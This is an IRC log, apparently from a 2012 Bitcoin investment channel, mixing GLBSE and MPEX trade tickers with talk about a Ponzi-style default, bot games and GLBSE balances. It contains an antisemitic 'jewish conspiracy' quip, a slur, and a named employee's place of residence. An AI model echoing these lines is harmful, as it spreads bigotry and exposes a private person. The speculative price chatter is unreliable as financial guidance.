22:57:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.64999997 BTC [-] Aug 23 22:57:55 [GLBSE] [TYGRR.BOND-P] 5 @ 0.64999998 = 3.25 BTC [+] Aug 23 22:57:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.64999999 BTC [+] Aug 23 22:57:57 [GLBSE] [TYGRR.BOND-P] 20 @ 0.65 = 13 BTC [+] Aug 23 22:58:52 [GLBSE] [TYGRR.BOND-P] 4 @ 0.68 = 2.72 BTC [+] Aug 23 22:58:53 [GLBSE] [TYGRR.BOND-P] 30 @ 0.69 = 20.7 BTC [+] Aug 23 22:59:46 [GLBSE] [HYDRO.BONDS] 3 @ 1.6799 = 5.0397 BTC [+] Aug 23 23:00:40 [GLBSE] [PPT.B] 10 @ 0.5 = 5 BTC [-] Aug 23 23:01:34 [GLBSE] [OBSI.HRPT] 95 @ 0.10495 = 9.9703 BTC [+] Aug 23 23:02:03 [GLBSE] [KRAKEN] 1000 @ 0.01 = 10 BTC Aug 23 23:04:09 [GLBSE] [FPGAMINING] 1 @ 0.91969 BTC [+] Aug 23 23:11:09 [MPEX] [S.MPOE] 200 @ 0.0003888 = 0.0778 BTC [+] Aug 23 23:11:11 [MPEX] [S.MPOE] 6252 @ 0.00038847 = 2.4287 BTC [-] Aug 23 23:11:12 [MPEX] [S.MPOE] 21948 @ 0.00038828 = 8.522 BTC [-] Aug 23 23:11:56 [GLBSE] [BDK] 3 @ 0.1 = 0.3 BTC [+] Aug 23 23:12:12 [MPEX] [F.GIGA.ETF] 9800 @ 0.00101538 = 9.9507 BTC [-] Aug 23 23:15:04 [GLBSE] [MOVETO.FUND] 5 @ 1.18480856 = 5.924 BTC [+] Aug 23 23:17:36 [GLBSE] [FPGAMINING] 1 @ 0.91969 BTC [+] Aug 23 23:19:46 [GLBSE] [YABMC] 3 @ 0.1289 = 0.3867 BTC [-] Aug 23 23:22:01 [GLBSE] [MOORE] 1 @ 0.4 BTC [-] Aug 23 23:22:03 [GLBSE] [MOORE] 1 @ 0.38 BTC [-] Aug 23 23:23:13 [GLBSE] [FZB.A] 25 @ 0.033 = 0.825 BTC [-] Aug 23 23:23:44 [MPEX] [S.MPOE] 28652 @ 0.00038828 = 11.125 BTC [-] Aug 23 23:23:45 [MPEX] [S.MPOE] 7548 @ 0.00038804 = 2.9289 BTC [-] Aug 23 23:25:33 [MPEX] [F.GIGA.ETF] 7180 @ 0.00100488 = 7.215 BTC [-] Aug 23 23:25:35 [MPEX] [F.GIGA.ETF] 3141 @ 0.00099742 = 3.1329 BTC [-] Aug 23 23:25:36 [MPEX] [F.GIGA.ETF] 1400 @ 0.00099495 = 1.3929 BTC [-] Aug 23 23:25:37 [MPEX] [F.GIGA.ETF] 6079 @ 0.00099422 = 6.0439 BTC [-] Aug 23 23:31:35 [GLBSE] [GIGAMINING] 1 @ 0.983 BTC [-] Aug 23 23:31:37 [GLBSE] [GIGAMINING] 2 @ 0.983 = 1.966 BTC [-] Aug 23 23:31:38 [GLBSE] [GIGAMINING] 4 @ 0.983 = 3.932 BTC [-] Aug 23 23:32:45 [GLBSE] [ASICMINER] 15 @ 0.0961 = 1.4415 BTC [-] Aug 23 23:32:46 [GLBSE] [ASICMINER] 20 @ 0.096 = 1.92 BTC [-] Aug 23 23:32:48 [GLBSE] [ASICMINER] 1 @ 0.0956 BTC [-] Aug 23 23:32:49 [GLBSE] [ASICMINER] 10 @ 0.0955 = 0.955 BTC [-] Aug 23 23:32:50 [GLBSE] [ASICMINER] 23 @ 0.0901 = 2.0723 BTC [-] Aug 23 23:33:45 [GLBSE] [FPGAMINING] 1 @ 0.91979 BTC [+] Aug 23 23:35:04 [GLBSE] [YARR] 1 @ 0.99999998 BTC [+] Aug 23 23:37:42 22:36.31 ( Keefe ) i confirm another small BST account got paid out today. friend of mine Aug 23 23:37:42 22:36.50 ( Keefe ) ~100 btc area Aug 23 23:38:33 mk Aug 23 23:39:28 woop Aug 23 23:39:28 it works Aug 23 23:39:31 https://199.48.69.241/hotwallet/devicoin.php Aug 23 23:39:35 Devil Coins! Aug 23 23:39:38 [GLBSE] [FZB.A] 17 @ 0.0359 = 0.6103 BTC [+] Aug 23 23:39:40 [GLBSE] [FZB.A] 8 @ 0.036 = 0.288 BTC [+] Aug 23 23:41:00 smickles you're right, ssl is bullshit Aug 23 23:41:04 one good reason to never use https Aug 23 23:41:57 [GLBSE] [BIB.PIRATE] 2 @ 0.6501 = 1.3002 BTC [-] Aug 23 23:42:00 [GLBSE] [FZB.A] 1 @ 0.03689999 BTC [+] Aug 23 23:43:26 [GLBSE] [FZB.A] 1 @ 0.064 BTC [+] Aug 23 23:44:19 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [+] Aug 23 23:44:28 [GLBSE] [BIB.PIRATE] 10 @ 0.65 = 6.5 BTC [-] Aug 23 23:44:38 [GLBSE] [PUREMINING] 5 @ 0.1293 = 0.6465 BTC [-] Aug 23 23:46:02 smickles martha mcculler actually works for me. not an agent, an employee. Aug 23 23:47:09 [MPEX] [S.MPOE] 17900 @ 0.00038815 = 6.9479 BTC [+] Aug 23 23:47:13 even better Aug 23 23:49:00 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [+] Aug 23 23:49:37 and she lives at a mail forwarding company Aug 23 23:53:24 actually she lives in romania. Aug 23 23:53:55 that's not enough for us nexsu Aug 23 23:53:58 nexus Aug 23 23:54:01 to get a .us domain Aug 23 23:54:14 sometimes the registry cares, sometimes not Aug 23 23:54:51 "that" Aug 23 23:55:15 whoa Aug 23 23:56:06 GPUmax invites just came in for accounts on the waiting list months apart Aug 23 23:57:03 whoa, you're right!!! Aug 23 23:57:09 thanks for the heads up obsi Aug 24 00:00:06 [GLBSE] [ASICMINER] 10 @ 0.0862 = 0.862 BTC [-] Aug 24 00:00:07 [GLBSE] [ASICMINER] 15 @ 0.0861 = 1.2915 BTC [-] Aug 24 00:00:09 [GLBSE] [ASICMINER] 3 @ 0.086 = 0.258 BTC [-] Aug 24 00:00:10 [GLBSE] [ASICMINER] 30 @ 0.08500001 = 2.55 BTC [-] Aug 24 00:00:11 [GLBSE] [ASICMINER] 18 @ 0.085 = 1.53 BTC [-] Aug 24 00:00:12 [GLBSE] [ASICMINER] 150 @ 0.085 = 12.75 BTC [-] Aug 24 00:00:14 [GLBSE] [ASICMINER] 30 @ 0.08200001 = 2.46 BTC [-] Aug 24 00:00:14 [GLBSE] [ASICMINER] 50 @ 0.082 = 4.1 BTC [-] Aug 24 00:00:15 [GLBSE] [ASICMINER] 10 @ 0.08000011 = 0.8 BTC [-] Aug 24 00:00:16 [GLBSE] [ASICMINER] 40 @ 0.08000011 = 3.2 BTC [-] Aug 24 00:00:17 [GLBSE] [ASICMINER] 100 @ 0.08 = 8 BTC [-] Aug 24 00:00:18 [GLBSE] [ASICMINER] 1 @ 0.07 BTC [-] Aug 24 00:00:19 [GLBSE] [ASICMINER] 20 @ 0.05000001 = 1 BTC [-] Aug 24 00:00:21 [GLBSE] [ASICMINER] 80 @ 0.05000001 = 4 BTC [-] Aug 24 00:00:22 [GLBSE] [ASICMINER] 2443 @ 0.00021 = 0.513 BTC [-] Aug 24 00:00:46 whuuuuuuuuuut Aug 24 00:01:13 someone got hacked Aug 24 00:01:17 whoa Aug 24 00:01:28 maybe bad news Aug 24 00:01:35 That bad? Aug 24 00:01:43 I don't think so... Aug 24 00:01:43 "no asics" Aug 24 00:01:59 uh Aug 24 00:02:09 just asicminer tho, hum. Aug 24 00:02:13 [GLBSE] [OBSI.HRPT] 2 @ 0.1045 = 0.209 BTC [-] Aug 24 00:03:57 A really bad mistake? Aug 24 00:04:11 Or really, really bad news? Aug 24 00:04:32 no news in the thread Aug 24 00:04:37 [GLBSE] [NASTY] 17 @ 0.5899 = 10.0283 BTC [-] Aug 24 00:04:38 [GLBSE] [NASTY] 9 @ 0.59 = 5.31 BTC [+] Aug 24 00:04:39 [GLBSE] [NASTY] 3 @ 0.6 = 1.8 BTC [+] Aug 24 00:04:46 I like how people spend eight bucks for IPOs Aug 24 00:04:48 if you sum it all up tho... it's like no btc Aug 24 00:04:50 20 ? Aug 24 00:04:53 [GLBSE] [PUREMINING] 8 @ 0.115 = 0.92 BTC [-] Aug 24 00:04:54 and they don't get activated until last minute Aug 24 00:04:55 [GLBSE] [PUREMINING] 15 @ 0.1101 = 1.6515 BTC [-] Aug 24 00:04:56 [GLBSE] [PUREMINING] 89 @ 0.11 = 9.79 BTC [-] Aug 24 00:04:56 [GLBSE] [PUREMINING] 2 @ 0.1049 = 0.2098 BTC [-] Aug 24 00:05:43 it's the jewish conspiracy EmanuelDeOrtego_ Aug 24 00:05:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.73999999 BTC [+] Aug 24 00:05:47 [GLBSE] [TYGRR.BOND-P] 10 @ 0.74 = 7.4 BTC [+] Aug 24 00:05:48 [GLBSE] [TYGRR.BOND-P] 9 @ 0.75 = 6.75 BTC [+] Aug 24 00:06:05 someone was raising funds to put into BOND-P Aug 24 00:06:23 figuers they'll get paid then buyback Aug 24 00:06:36 [GLBSE] [NYAN.B] 1 @ 0.99999 BTC [-] Aug 24 00:06:45 I'd guess glbse prices spike across the board if/when the ppt's all pay out Aug 24 00:06:46 [GLBSE] [PUREMINING] 15 @ 0.1151 = 1.7265 BTC [+] Aug 24 00:07:21 exahash: yes, I was thinking the same Aug 24 00:07:29 I hope Aug 24 00:07:39 I guess many people still don't use 2 step auth... Aug 24 00:07:41 I hope too Aug 24 00:07:50 [GLBSE] [TYGRR.BOND-P] 6 @ 0.75 = 4.5 BTC [+] Aug 24 00:07:51 There, the excedent money will have good uses Aug 24 00:08:18 It's needed by some companies that will do good Aug 24 00:08:19 on the fence, thinking about which ones will spike, many seem depressed atm... you don't have to buy ppt's to find a play on the pirate instability Aug 24 00:09:12 Let's hope that a lot of the flow can get there, and not going into the exchanges to be dumped.... Aug 24 00:09:14 if pirate actually pays s.dice will end up oversubscribed. Aug 24 00:10:26 If he doesn't pay, everybody will end dry... Aug 24 00:10:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.75 BTC [+] Aug 24 00:10:55 s/everybody/fools/ Aug 24 00:11:07 If everybody puts all their money in Satoshi Dice Aug 24 00:11:08 It's sad so much centralization Aug 24 00:11:15 the price Aug 24 00:11:21 is going through the roof Aug 24 00:11:23 for Bitcoin Aug 24 00:11:32 ;;ticker Aug 24 00:11:33 Best bid: 10.04537, Best ask: 10.1489, Bid-ask spread: 0.10353, Last trade: 10.04537, 24 hour volume: 60801, 24 hour low: 9.70001, 24 hour high: 10.25 Aug 24 00:11:36 what roof lol Aug 24 00:11:39 Erik hoards all his profits Aug 24 00:11:53 Yes, there was fools the ones who put everything there, but everybody will end dry Aug 24 00:12:02 http://polimedia.us/dtng/c/src/13342697848.jpg does she look professional btw ? Aug 24 00:12:04 Anything Erik makes, it goes into a chest that will not be opened until 2050 Aug 24 00:12:14 rdponticelli i don't see how i'd end up dry. Aug 24 00:12:39 ;;seen evoorhees Aug 24 00:12:39 evoorhees was last seen in #bitcoin-assets 2 days, 1 hour, 34 minutes, and 0 seconds ago: and B) there is risk in that offering Aug 24 00:12:53 [GLBSE] [TEEK.USD] 1 @ 0.08999 BTC [+] Aug 24 00:13:36 Everybody is already almost dry... Aug 24 00:13:41 nope. Aug 24 00:14:20 [17:12] Total Accounts Paid: 11 Aug 24 00:14:34 [17:12] All small accounts. Aug 24 00:14:46 -.- Aug 24 00:15:28 mircea_popescu: well, you already stopped paying interest... Aug 24 00:15:28 A lot of businesses are desperate trying to get some capital.... Aug 24 00:15:40 Pirate is managing everything Aug 24 00:16:03 And now, he's moving to control all the hash power Aug 24 00:16:09 rdponticelli lmao. Aug 24 00:16:19 [GLBSE] [ASICMINER] 3 @ 0.0988 = 0.2964 BTC [+] Aug 24 00:16:20 If it becomes a problem, it will fix itself. Aug 24 00:16:24 i think you're really overestimating the thing based on your overexposure to it. Aug 24 00:16:26 I am not worried one bit. Aug 24 00:16:35 sort of like how people think everyone they see on tv a lot is really rich. Aug 24 00:16:53 I'm not overexposed Aug 24 00:16:55 I think that's just called being retarded Aug 24 00:17:07 [GLBSE] [TYGRR.BOND-P] 4 @ 0.75 = 3 BTC [+] Aug 24 00:17:09 [GLBSE] [TYGRR.BOND-P] 6 @ 0.75 = 4.5 BTC [+] Aug 24 00:17:32 Just put in some play money, to see what happened... Aug 24 00:17:46 And took the capital out, almost immediatly Aug 24 00:17:58 [GLBSE] [TYGRR.BOND-P] 4 @ 0.75 = 3 BTC [+] Aug 24 00:18:27 overexposed in the sense of reading/watching too much of it. Aug 24 00:18:32 not financially, but sensorially. Aug 24 00:19:12 but the drama, who can resist Aug 24 00:19:33 i know Aug 24 00:19:36 still. Aug 24 00:19:57 Place bets against pirate... Aug 24 00:20:16 The good way to go. Aug 24 00:21:10 If he pays and you lose, who cares? It's like the most amazing news for bitcoins ever =/ Aug 24 00:22:35 http://www.bitcoincharts.com/markets/mtgoxUSD.html < Why is there so much ask but price does not decrease? Aug 24 00:22:55 Also ask steps seems pretty regular Aug 24 00:22:59 ;;eightball will pirate default Aug 24 00:22:59 I doubt it very much. Aug 24 00:23:02 :D Aug 24 00:23:15 lol Aug 24 00:23:22 hahaha Aug 24 00:23:24 that's all i need to know Aug 24 00:23:38 buybuybuy (in Cramer voice) Aug 24 00:23:39 gribble knows better :D Aug 24 00:23:57 [MPEX] [S.MPOE] 7100 @ 0.00038815 = 2.7559 BTC [+] Aug 24 00:23:57 [MPEX] [S.MPOE] 18043 @ 0.00038804 = 7.0014 BTC [-] Aug 24 00:23:57 ;;eightball will pirate, instead of defaulting, won't be able to reimburse everything but offer 10%? Aug 24 00:23:58 You're kidding, right? Aug 24 00:23:58 [MPEX] [S.MPOE] 24312 @ 0.000388 = 9.4331 BTC [-] Aug 24 00:24:10 ;;eightball 25%? Aug 24 00:24:10 even better Aug 24 00:24:11 About as likely as pigs flying. Aug 24 00:24:18 holy crap Aug 24 00:24:20 hmm... Aug 24 00:24:26 smart gribble... Aug 24 00:24:30 quit while you're ahead! Aug 24 00:24:36 ;;eightball 1%? Aug 24 00:24:36 The outlook is good. Aug 24 00:24:41 lol Aug 24 00:24:42 too late Aug 24 00:24:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.79999999 BTC [+] Aug 24 00:24:59 [GLBSE] [TYGRR.BOND-P] 4 @ 0.8 = 3.2 BTC [+] Aug 24 00:25:00 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [+] Aug 24 00:25:01 [GLBSE] [TYGRR.BOND-P] 144 @ 0.81 = 116.64 BTC [+] Aug 24 00:25:08 ha Aug 24 00:25:14 .8? Aug 24 00:25:15 Well, somebody trusted eightball Aug 24 00:25:17 too much Aug 24 00:25:21 [GLBSE] [NYAN.A] 20 @ 1 = 20 BTC [-] Aug 24 00:25:30 [GLBSE] [PUREMINING] 1 @ 0.1265 BTC [+] Aug 24 00:25:39 gribble is spreading the word :) Aug 24 00:26:20 [GLBSE] [YABMC] 1 @ 0.1289 BTC [-] Aug 24 00:27:25 ;;eightball will I win and get paid for my bet against pirate? Aug 24 00:27:26 Maybe... Aug 24 00:27:59 Hmm, well can't go wrong with maybes Aug 24 00:28:08 ;;eightball Will the Tesla museum get built? Aug 24 00:28:09 The answer is def-- oooh! shiny thing! Aug 24 00:28:15 lol Aug 24 00:28:23 best answer ev4r Aug 24 00:28:30 You're always spot on with ambiguity Aug 24 00:28:49 [GLBSE] [CIUCIU.BOND] 50 @ 0.1 = 5 BTC [+] Aug 24 00:29:39 [GLBSE] [PPT.B] 7 @ 0.9 = 6.3 BTC [+] Aug 24 00:30:38 ahaha gribble is on a roll Aug 24 00:31:56 ;;eightball Is pirate on an island, sitting in a chair, telling his investors not to worry by chatting in his channel on his laptop? Aug 24 00:31:57 It is so. Aug 24 00:32:14 ha Aug 24 00:32:25 So it is. Aug 24 00:32:46 [MPEX] [S.MPOE] 59700 @ 0.00038798 = 23.1624 BTC [-] Aug 24 00:32:48 ;;eightball If we buy enough PPT can we go with him? Aug 24 00:32:48 No. Aug 24 00:32:54 Shit Aug 24 00:33:00 damn Aug 24 00:33:02 lol Aug 24 00:33:09 ;;eightball Will pirate finally send the postcard I keep requesting? Aug 24 00:33:09 Come again? Aug 24 00:33:11 Everybody sell! Aug 24 00:33:43 ;;eightball the postcard from his island retreat? Aug 24 00:33:44 I doubt it very much. Aug 24 00:34:09 ;;eightball postcard with no return adress and NOT sent from his island? Aug 24 00:34:09 It is possible. Aug 24 00:34:34 ;;later tell coingenuity who is nimda and what exactly is their problem ? Aug 24 00:34:34 The operation succeeded. Aug 24 00:34:49 mircea_popescu: i have no idea on either one Aug 24 00:34:51 Looking forward to get that postcard. Aug 24 00:34:56 mkay... Aug 24 00:35:03 ? Aug 24 00:35:09 advertising you on forum while talking inane shit about me Aug 24 00:35:10 they starting shit with you or something? Aug 24 00:35:16 ahhhh in their sig? Aug 24 00:35:19 yes. Aug 24 00:35:22 yeah, we do that with a lot of users Aug 24 00:35:27 i don't know him personally at all Aug 24 00:35:27 ;;eightball Will bitcointalk trolls get Neustar to cancel polimedia.us for lacking nexus? Aug 24 00:35:28 The answer is def-- oooh! shiny thing! Aug 24 00:35:28 mkay. no big deal really Aug 24 00:35:31 i apologize vicariously though Aug 24 00:35:31 was just curious wtf. Aug 24 00:35:36 dun worry srsly. Aug 24 00:35:40 forum is so full of nuts... Aug 24 00:35:45 ya, its funny Aug 24 00:35:55 sometimes i see 2x people both with sigs advertising me yelling at each other Aug 24 00:35:59 lol Aug 24 00:36:26 anyway, back to work, be back later Aug 24 00:36:34 cheers. Aug 24 00:36:45 ;;ticker Aug 24 00:36:46 Best bid: 10.014, Best ask: 10.04998, Bid-ask spread: 0.03598, Last trade: 10.04997, 24 hour volume: 59662, 24 hour low: 9.70001, 24 hour high: 10.25 Aug 24 00:36:57 well, i know the answer to all this pirate drama Aug 24 00:37:06 ;;roulette Aug 24 00:37:07 *click* Aug 24 00:37:09 :D Aug 24 00:37:16 ;;roulette Aug 24 00:37:16 *click* Aug 24 00:37:31 [GLBSE] [SS] 3 @ 2.02 = 6.06 BTC [+] Aug 24 00:37:34 There's four left Aug 24 00:37:38 :) Aug 24 00:37:43 [GLBSE] [BTCMC] 1 @ 0.635 BTC [+] Aug 24 00:38:03 Nobody? Aug 24 00:38:03 we didn't spinn it first ;)] Aug 24 00:38:06 ;;roulette Aug 24 00:38:06 *click* Aug 24 00:38:10 i think gribbles chamber is infinitve Aug 24 00:38:12 ;;roulette Aug 24 00:38:13 *click* Aug 24 00:38:14 ahaha! Aug 24 00:38:19 dam Aug 24 00:38:23 lucky you Aug 24 00:38:51 *silence* Aug 24 00:38:59 it should be 50/50 now Aug 24 00:39:04 ;;roulette Aug 24 00:39:05 *BANG* Hey, who put a blank in here?! Aug 24 00:39:09 lol Aug 24 00:39:16 ;;roulette Aug 24 00:39:16 *click* Aug 24 00:39:21 ooh Aug 24 00:39:42 it would've been me Aug 24 00:39:44 gribble isn't operator here? Aug 24 00:40:08 He kicks you out on other channels :) Aug 24 00:40:10 doesn't need to be, i suppose Aug 24 00:40:32 roulette isn't so fun, then :) Aug 24 00:40:33 i can put real bullets in if you like Aug 24 00:40:37 lol Aug 24 00:40:59 Can he shoot satoshis? Aug 24 00:41:47 btw, kakobreklaa: do you operate gribble too? Aug 24 00:41:54 [GLBSE] [ASICMINER] 7 @ 0.0988 = 0.6916 BTC [+] Aug 24 00:41:55 [GLBSE] [ASICMINER] 13 @ 0.09897991 = 1.2867 BTC [+] Aug 24 00:41:56 nano does that Aug 24 00:42:07 It would be nice if he goes to bitcoin-ar Aug 24 00:42:17 msg nano Aug 24 00:42:18 I feel a little lonely in there :D Aug 24 00:42:26 Thanks Aug 24 00:43:00 -ar is argentina ? Aug 24 00:43:06 ;;ident Aug 24 00:43:06 You are not identified. Aug 24 00:43:09 :o Aug 24 00:43:09 Yes Aug 24 00:43:16 rdponticelli you from there ? how is it ? Aug 24 00:43:22 i sorta am half-thinking of moving there. Aug 24 00:43:42 mircea_popescu: I'm Aug 24 00:43:54 Its nice, I guess... Aug 24 00:44:01 Like every place Aug 24 00:44:19 Has his pros and his againsts... Aug 24 00:44:24 do shops/bars/etc close down before dawn ? Aug 24 00:44:37 Yes Aug 24 00:44:39 bah. Aug 24 00:44:50 Shitty gobernements are ruining all the fun Aug 24 00:44:57 Buying all kind of shares Aug 24 00:44:58 is there plenty of prostitution and not much police going about ? Aug 24 00:45:22 didnt the ar govt seize their biggest oil co earlier this year? Aug 24 00:45:28 srsly ? Aug 24 00:45:36 dude what the fuck with the governments already Aug 24 00:45:39 why do they still exist ? Aug 24 00:45:42 that's kinda anti-mircea Aug 24 00:45:42 There are prostitution... It's forbidden, but the police are part of the maffias... Aug 24 00:45:57 i don't get this. it's like having religion. what the fuck it's 2012, different millenium, get with the program. Aug 24 00:46:18 exahash: yes, they did Aug 24 00:46:32 mircea_popescu: yeah man, it's the age of aquarius Aug 24 00:46:37 ;) Aug 24 00:46:47 lol does that mean we hafta swim nao ?\ Aug 24 00:46:49 YPF that's it Aug 24 00:46:56 Well, governments are the same shit everywhere... Aug 24 00:46:56 Looking to purchase shares at a discount. If there's not enough bidding, query me, might just place a bid Aug 24 00:47:02 [GLBSE] [BITBOND] 1 @ 0.459 BTC [-] Aug 24 00:47:06 and you can't move USD cash across a border Aug 24 00:47:16 BTC-Mining: shares of SS? Aug 24 00:47:16 BTC-Mining you shoudl buy rg's stuff, nobody wants it Aug 24 00:47:22 or MPOE.ETF? Aug 24 00:47:33 exahash: yes, that is Aug 24 00:47:44 oh, syntax ambiguity Aug 24 00:47:46 cuz the argentinians are abandoning their own currency and trying to get USD instead Aug 24 00:47:55 It was controlled by a spanish enterprise Aug 24 00:48:02 BTC-Mining: so /you/ are the one looking to buy? Aug 24 00:48:04 anyone notice their GLBSE balance lower than it should be? Aug 24 00:48:17 [GLBSE] [RSM] 5 @ 0.29 = 1.45 BTC [-] Aug 24 00:48:20 0_o Aug 24 00:48:25 really Obsi ? Aug 24 00:48:28 thus btc may be a very good choice in such a place Aug 24 00:48:38 [GLBSE] [TEEK.B] 1 @ 0.8 BTC [-] Aug 24 00:48:38 And now we are abandoning our currency to get bitcoins :) Aug 24 00:48:51 I thought so too, but I recalculated and it seemed ok Aug 24 00:48:52 not sure... could have sword it was in the 60's this morning... now at 58... will have to look closer Aug 24 00:48:57 *sworn Aug 24 00:49:10 Obsi: well, stuff like that has happened before on glbse, iirc Aug 24 00:49:22 Obsi, recheck your latest purchase, fees, transfers, withdrawals Aug 24 00:49:26 or Aug 24 00:49:56 Today nefario rolled some big changes, i think... Aug 24 00:50:06 Anything can happens.... Aug 24 00:50:18 yeah he's adding the no reserve thing so maybe math went wrong somewhere, but it could just be my bad memory Aug 24 00:50:49 pull your csv and do the math Aug 24 00:50:54 [GLBSE] [BTCMC] 9 @ 0.56 = 5.04 BTC [-] Aug 24 00:51:05 add /balance I think to your portfolio adress Aug 24 00:51:17 or something like that I think Aug 24 00:51:29 [GLBSE] [MPOE.ETF] 9 @ 1.4 = 12.6 BTC [+] Aug 24 00:51:38 Will recalculate your total BTC based on your CSV info Aug 24 00:51:42 [GLBSE] [BTCMC] 18 @ 0.55 = 9.9 BTC [-] Aug 24 00:53:06 Thanks BTC-Mning! Mine went up! Aug 24 00:53:18 ah, so it works Aug 24 00:53:24 wasn't sure of the url Aug 24 00:53:50 https://glbse.com/portfolio/balance Aug 24 00:54:14 oic, dividend that just came in Aug 24 00:54:22 arf =P Aug 24 00:54:30 17:45 Obsi paid Aug 24 00:54:31 I think balance error might be very rare Aug 24 00:55:07 thanks Obsi! Aug 24 00:55:13 Yeah I'm gonna chalk it up to bad memory for now... I'd have to write a script to parse my CSV Aug 24 00:55:18 you're welcome Aug 24 00:55:37 there's a php script out there Aug 24 00:55:41 can't remember the name Aug 24 00:57:28 https://bitcointalk.org/index.php?topic=89970.0 Aug 24 00:57:36 I guess he hasn't maintained it tho Aug 24 00:58:25 shouldn't need that much maintaining in any event Aug 24 01:00:16 nefario said he'd work on the spreadsheets along all the tings he's working on. Aug 24 01:00:39 Maybe so each line contains a positive or negative BTC value when appropriate, along other things Aug 24 01:00:46 for the total of each transactions? Aug 24 01:01:11 For now I guess you'd need multiple conditions based on what each line is. Aug 24 01:01:17 [GLBSE] [OBSI.HRPT] 1 @ 0.1045 BTC [-] Aug 24 01:02:53 [GLBSE] [FPGAMINING] 1 @ 0.9198 BTC [+] Aug 24 01:03:32 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [-] Aug 24 01:04:32 [MPEX] [F.GIGA.ETF] 1681 @ 0.00101483 = 1.7059 BTC [+] Aug 24 01:04:33 [MPEX] [F.GIGA.ETF] 2519 @ 0.00101538 = 2.5577 BTC [+] Aug 24 01:05:06 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [-] Aug 24 01:05:23 smickles: SS hmm... I have no idea of their pirate exposure, so not really willing to. Aug 24 01:07:18 mircea_popescu: I do go to IRC Aug 24 01:07:20 just not here Aug 24 01:08:54 [GLBSE] [DMC] 3 @ 0.049 = 0.147 BTC [-] Aug 24 01:10:13 [GLBSE] [YABMC] 2 @ 0.1204 = 0.2408 BTC [-] Aug 24 01:10:14 [GLBSE] [YABMC] 7 @ 0.1152 = 0.8064 BTC [-] Aug 24 01:10:21 [GLBSE] [OBSI.1MHS] 40 @ 0.09876 = 3.9504 BTC [-] Aug 24 01:10:38 hi there boonies4u Aug 24 01:10:56 what do you mean ? Aug 24 01:11:48 I was on #btcst from the evening to 6am last night Aug 24 01:11:56 i frequent #bitcoin-otc Aug 24 01:12:00 and am voiced there now Aug 24 01:12:32 a haven't been in otc myself in a while. Aug 24 01:12:56 I took a break following the bubble :P Aug 24 01:13:03 but i'm back in the saddle now Aug 24 01:13:03 so what can i do for you ? or am i missing something here ? Aug 24 01:13:16 mircea_popescu: you told me to check out irc on the forums? Aug 24 01:13:24 mmm Aug 24 01:13:33 i did ? Aug 24 01:13:45 o, you mean the girl ? Aug 24 01:13:50 mircea_popescu: someone did Aug 24 01:13:55 mpoe-pr ? Aug 24 01:13:58 oh you actually have a PR? Aug 24 01:14:02 ... Aug 24 01:14:03 I though that was another account Aug 24 01:14:04 yes lol Aug 24 01:15:13 o i c, the entire citizenry thing. Aug 24 01:15:34 she said that cause well... doesn't really have teh autoritah to discuss those matters, so. Aug 24 01:15:54 mircea_popescu: at least you know your place :3 Aug 24 01:16:06 hm ? Aug 24 01:16:36 at least you know not to cause trouble Aug 24 01:16:50 haha. i cause plenty of trouble methinks. Aug 24 01:17:40 you were also quoted with someone I believe gave me an earful as well Aug 24 01:17:41 [GLBSE] [OBSI.HRPT] 2 @ 0.1045 = 0.209 BTC [+] Aug 24 01:18:04 is EmanuelDeOrtego_ really atlas btw ? Aug 24 01:18:40 mircea_popescu: ask _matthew_ Aug 24 01:18:43 in #btcst Aug 24 01:18:53 he sure talks like Atlas Aug 24 01:19:01 Yeah Aug 24 01:19:16 EmanuelDeOrtego_ is there anyone in btw you didn't end up dramatizing with ? Aug 24 01:19:21 s/btw/btc Aug 24 01:19:42 Lurkers Aug 24 01:19:48 [GLBSE] [FPGAMINING] 1 @ 0.9198 BTC [+] Aug 24 01:20:06 this is why irc is much better than forums. i rest my case. Aug 24 01:20:18 irc++ Aug 24 01:20:28 :) Aug 24 01:20:41 I steered cleared of Atlas threads as best as I could Aug 24 01:20:46 IRC was a bit... harder Aug 24 01:21:19 which reminds me the joke about kids learning the degrees of comparative Aug 24 01:21:30 I really don't do much Aug 24 01:21:32 teacher has them each give an example Aug 24 01:21:36 I don't RAAGGGGEEE Aug 24 01:21:40 I don't try to change people Aug 24 01:21:43 johnny : large, larger, largest Aug 24 01:21:53 janie : deep, deeper, ouch. Aug 24 01:21:59 lol Aug 24 01:22:18 oww Aug 24 01:23:20 [GLBSE] [OBSI.HRPT] 9 @ 0.1045 = 0.9405 BTC [+] Aug 24 01:23:55 [MPEX] [S.MPOE] 12545 @ 0.00038799 = 4.8673 BTC [+] Aug 24 01:23:57 [MPEX] [S.MPOE] 60700 @ 0.00038837 = 23.5741 BTC [+] Aug 24 01:23:58 [MPEX] [S.MPOE] 3936 @ 0.00038864 = 1.5297 BTC [+] Aug 24 01:23:59 [MPEX] [S.MPOE] 40600 @ 0.00038907 = 15.7962 BTC [+] Aug 24 01:24:00 [MPEX] [S.MPOE] 8500 @ 0.00039177 = 3.33 BTC [+] Aug 24 01:24:02 [MPEX] [S.MPOE] 11000 @ 0.00039231 = 4.3154 BTC [+] Aug 24 01:24:02 [MPEX] [S.MPOE] 3650 @ 0.00039295 = 1.4343 BTC [+] Aug 24 01:24:03 [MPEX] [S.MPOE] 59069 @ 0.00039395 = 23.2702 BTC [+] Aug 24 01:25:31 mircea_popescu: does MPOE-PR have a handle here? Aug 24 01:25:55 http://i.imgur.com/F8lqo.jpg Aug 24 01:26:00 I would buy this. Aug 24 01:26:04 boonies4u nope Aug 24 01:26:20 she ocasionally goes into -otc i guess Aug 24 01:26:46 mircea_popescu: ok Aug 24 01:26:50 that's worth money ?! Aug 24 01:27:20 I'd mount up stereocopic images on those frames Aug 24 01:27:33 having hidden images on them Aug 24 01:27:41 that you could only see when 3d Aug 24 01:27:47 mircea_popescu: It's worth at least 100k Aug 24 01:27:56 It would resell easily Aug 24 01:27:59 EmanuelDeOrtego_: it or they? Aug 24 01:28:03 greater fool theory eh ? Aug 24 01:28:05 [GLBSE] [OBSI.HRPT] 24 @ 0.1049 = 2.5176 BTC [+] Aug 24 01:28:13 boonies4u: Well, you need both pieces. Aug 24 01:28:23 It would be incomplete 